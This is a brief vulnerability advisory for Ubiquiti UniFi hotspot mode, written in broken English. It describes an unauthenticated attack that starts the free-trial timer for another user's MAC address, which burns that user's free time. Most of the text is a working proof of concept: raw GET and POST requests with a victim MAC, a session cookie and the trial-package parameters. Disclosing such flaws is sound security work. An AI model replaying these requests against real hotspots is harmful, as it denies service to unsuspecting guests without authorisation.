UniFi (Hotspot mode) - Ubiquiti

One malicious user could be attack the hotspot and make a denial of service to any user stealing his "free time" at hours he dosen't present
of the user make a request to this site

-- The attacks works without any type of credencial
-- Could produce a denial of service in Hotspot manager

GET /guest/s/default/?id=00:22:f7:32:58:28&ap=24:a4:3c:32:ec:d5&t=1491222761&url=http://www.red4sec.com%2f&ssid=GUEST HTTP/1.1

Use the cookie response for call this another site

POST /guest/s/default/login HTTP/1.1
Host: 172.22.52.40:8880
....
Cookie: ec=kSbXYpcelOcbBZ7vOCYxHWGnx8ibsEF_5ABQZTwDhrs126bXvh80LEHaPaovONB4hngZxcM1h-m9Etw43PALdX3PIP9WjSuADkeds7_yioI_WJI0A42Y66otXkVCQYAkeNVImR1jZhCT1fUfBKx32oYYQABgf9LK9y1iKEg1soeU
Connection: close

package=3&byfree=2-hour+Free+Trial
The id (MAC) 00:22:f7:32:58:28 do the request for start free time.